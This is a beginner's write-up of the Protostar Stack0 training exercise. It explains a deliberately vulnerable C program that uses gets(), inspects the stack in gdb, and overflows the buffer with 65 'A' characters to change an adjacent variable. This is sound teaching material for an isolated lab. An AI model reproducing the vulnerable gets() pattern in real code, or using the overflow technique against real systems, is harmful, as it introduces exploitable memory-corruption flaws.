An Introduction To Binary Exploitation

Interested in binary exploitation? Then welcome to a very detailed beginners guide and introduction to help you start your journey's in binary exploitation!

An Introduction To Binary Exploitation

Interested in binary exploitation? Then welcome to a very detailed beginners guide and introduction to help you start your journey's in binary exploitation!

Protostar from Exploit Exercises introduces basic memory corruption issues such as buffer overflows, format strings and heap exploitation under “old-style” Linux system that does not have any form of modern exploit mitigiation systems enabled.

After that we can move to more difficult exercises. Let's start with Stack0.

First of all, we take the code from Stack0:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}

If you are familiar with the basics of C, you can skip this part here.

Let's break down this simple code:

On the first three lines we can see some header files. As tutorialspoint says:

A header file is a file with extension .h which contains C function declarations and macro definitions to be shared between several source files. There are two types of header files: the files that the programmer writes and the files that comes with your compiler.

argc stands for "Argument Count". The number of parameters will be stored in the parameter argc. Let's do an example:

#include<stdio.h>

int main(int argc, char* argv[]) {

	printf("argc = %d\n", argc);
	return 0;
}

If we now compile this program with gcc PROGRAM.c -o compiled and execute it with two arguments (like ./compiled WOW) then it should us return argc = 2, because we inserted two things.

argv saves the values of the parameters in a char array. Really, really basic stuff.

volatile int modified;

The keyword volatile tells the compiler that the value of the variable may change at any time, without any action being taken by the code the compiler finds nearby.

char buffer[64]

Can read an input about 64 characters.

modified = 0;

The variable modified is set to 0.

gets(buffer);

So, to get to know gets() we can use the manpage provided by linux. So we do 'man gets()'.

gets() reads a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a null byte (aq\0aq). No check for buffer overrun is performed (see BUGS below).
Never use gets(). Because it is impossible to tell without knowing the data in advance how many characters gets() will read, and because gets() will continue to store characters past the end of the buffer, it is extremely dangerous to use. It has been used to break computer security. Use fgets() instead.

So, now we know the bug in this program. The if-statement checks if the variable modified is 0 or not. Now we have a complete understanding what this code does. Let's break it!

Exploitation

First of all we need to download the Protostar-image. Then we can login into that machine with ssh. Username: user / Password: user.

$ ssh [email protected]


    PPPP  RRRR   OOO  TTTTT  OOO   SSSS TTTTT   A   RRRR  
    P   P R   R O   O   T   O   O S       T    A A  R   R 
    PPPP  RRRR  O   O   T   O   O  SSS    T   AAAAA RRRR  
    P     R  R  O   O   T   O   O     S   T   A   A R  R  
    P     R   R  OOO    T    OOO  SSSS    T   A   A R   R 

          http://exploit-exercises.com/protostar                                                 

Welcome to Protostar. To log in, you may use the user / user account.
When you need to use the root account, you can login as root / godmode.

For level descriptions / further help, please see the above url.

[email protected] password: user
Linux (none) 2.6.32-5-686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Sep 17 13:38:12 2018 from 192.168.0.54
$

Our file is located at /opt/protostar/bin. Let's run it once:

user@protostar:~$ /opt/protostar/bin/stack0
AAAA
Try again?

The code jumps into the else-statement and prints out "Try again?". Our main goal is to modify the variable modified and get the output: "you have changed the 'modified' variable".

Now let's open the stack0 in gdb with: gdb /opt/protostar/bin/stack0.

user@protostar:~$ gdb /opt/protostar/bin/stack0
Reading symbols from /opt/protostar/bin/stack0...done.
(gdb) 

Now we can disassemble the main function:

(gdb) disassemble main
Dump of assembler code for function main:
0x080483f4 <main+0>:  push   ebp
0x080483f5 <main+1>:  mov    ebp,esp
0x080483f7 <main+3>:  and    esp,0xfffffff0
0x080483fa <main+6>:  sub    esp,0x60
0x080483fd <main+9>:  mov    DWORD PTR [esp+0x5c],0x0
0x08048405 <main+17>: lea    eax,[esp+0x1c]
0x08048409 <main+21>: mov    DWORD PTR [esp],eax
0x0804840c <main+24>: call   0x804830c <gets@plt>
0x08048411 <main+29>: mov    eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>: test   eax,eax
0x08048417 <main+35>: je     0x8048427 <main+51>
0x08048419 <main+37>: mov    DWORD PTR [esp],0x8048500
0x08048420 <main+44>: call   0x804832c <puts@plt>
0x08048425 <main+49>: jmp    0x8048433 <main+63>
0x08048427 <main+51>: mov    DWORD PTR [esp],0x8048529
0x0804842e <main+58>: call   0x804832c <puts@plt>
0x08048433 <main+63>: leave  
0x08048434 <main+64>: ret    

The first four lines of the disassembly aren't very interesting.

The first interesting line is the fifth line. This line moves the value 0x0 to the memory address $esp + 0x5c

0x080483fd <main+9>:  mov    DWORD PTR [esp+0x5c],0x0

This is the modified variable since that memory address is checked at a later point to see if it's set to 0 using test $eax, $eax.

The next few lines says that the buffer array starts at the memory address $esp + 0x1c.

0x08048405 <main+17>:   lea    0x1c(%esp),%eax
0x08048409 <main+21>:   mov    %eax,(%esp)
0x0804840c <main+24>:   call   0x804830c <gets@plt>

Given that 0x5c - 0x1c is 64 bytes, we see that buffer and modified are allocated right next to each other on the stack.

We can modify the modified variable by writing past the space allocated for the buffer. A so called buffer overflow. We set a breakpoint at *0x080483fd, because there the variable modified is set to 0.

(gdb) break *0x80483fd
Breakpoint 1 at 0x80483fd: file stack0/stack0.c, line 10.

Now let's run the program.

(gdb) r
Starting program: /opt/protostar/bin/stack0 

Breakpoint 1, main (argc=1, argv=0xbffffd64) at stack0/stack0.c:10
10  stack0/stack0.c: No such file or directory.
  in stack0/stack0.c
(gdb) next
11  in stack0/stack0.c
(gdb) next
AAAAAAAAAAAAAAAAAAAAAAAA
13  in stack0/stack0.c

If you have typed in next twice the program waits for an input, so we typed in some capital A's.

The variables are stored in stack. That means we can now view them. In order to do it, we can use this command x/40x $esp. Let’s analyze it. Letters x means that the output will be printed in the hexadecimal format, 40 is the number of elements that we want to print and $esp is the name of the register we want to use.

(gdb) x/40xw $esp


0xbffff770:     0xbffff78c      0x00000001      0xb7fff8f8      0xb7f0186e

0xbffff780:     0xb7fd7ff4     0xb7ec6165      0xbffff798       0x41414141

0xbffff790:     0x41414141   0x41414141     0x414141    0x080482e8

0xbffff7a0:     0xb7ff1040     0x08049620     0xbffff7d8        0x08048469

0xbffff7b0:     0xb7fd8304    0xb7fd7ff4       0x08048450    0xbffff7d8

0xbffff7c0:     0xb7ec6365    0xb7ff1040      0x0804845b    0x00000000

0xbffff7d0:     0x08048450   0x00000000     0xbffff858       0xb7eadc76

0xbffff7e0:     0x00000001   0xbffff884         0xbffff88c        0xb7fe1848

0xbffff7f0:      0xbffff840      0xffffffff             0xb7ffeff4        0x0804824b

0xbffff800:     0x00000001   0xbffff840         0xb7ff0626      0xb7fffab0

See the big number of 0x41 digits stored in memory. The 41 is hexadecimal and has the value A.We can also see 0x00 values, which means that there's our modified variable is being stored.

Let's reach the variable!

So, one block of 0x41414141 stores 4 A's. There are 16 blocks. 4 * 16 is 64. + 1 to write into the modified variable. Let's do that:

user@protostar: echo `python -c "print 'A'*65"` | /opt/protostar/bin/stack0
you have changed the 'modified' variable

And we have changed our variable!

With python we can simply print 65 A letters and pipe it into our binary. Visually it would look like this:

0xbffff770:     0xbffff78c      0x00000001      0xb7fff8f8      0xb7f0186e

0xbffff780:     0xb7fd7ff4     0xb7ec6165      0xbffff798       0x41414141

0xbffff790:     0x41414141   0x41414141     0x414141    0x41414141

0xbffff7a0:     0x41414141     0x41414141     0x41414141        0x41414141

0xbffff7b0:     0x41414141    0x41414141       0x41414141    0x41414141

0xbffff7c0:     0x41414141    0x41414141      0x41414141    0x00000041

0xbffff7d0:     0x08048450   0x00000000     0xbffff858       0xb7eadc76

0xbffff7e0:     0x00000001   0xbffff884         0xbffff88c        0xb7fe1848

0xbffff7f0:      0xbffff840      0xffffffff             0xb7ffeff4        0x0804824b

0xbffff800:     0x00000001   0xbffff840         0xb7ff0626      0xb7fffab0

Hope you liked this introduction!

The GIF used to head this article is called "Flock Of Binaries" and it was created by Morton Niklasson.